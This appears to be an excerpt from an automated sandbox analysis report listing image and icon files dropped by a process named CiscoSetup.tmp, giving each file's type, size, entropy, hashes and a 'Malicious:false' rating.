                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3683
                                                                                                                                                                                                  Entropy (8bit):7.90204028759812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                                                                                  MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                                                                                  SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                                                                                  SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                                                                                  SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5803
                                                                                                                                                                                                  Entropy (8bit):7.950077949239442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                                                                                  MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                                                                                  SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                                                                                  SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                                                                                  SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31702
                                                                                                                                                                                                  Entropy (8bit):7.968827949628217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                                                                                  MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                                                                                  SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                                                                                  SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                                                                                  SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                                                                                  MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                                                                                  SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                                                                                  SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                                                                                  SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                  Entropy (8bit):7.787798189239225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                                                                                  MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                                                                                  SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                                                                                  SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                                                                                  SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
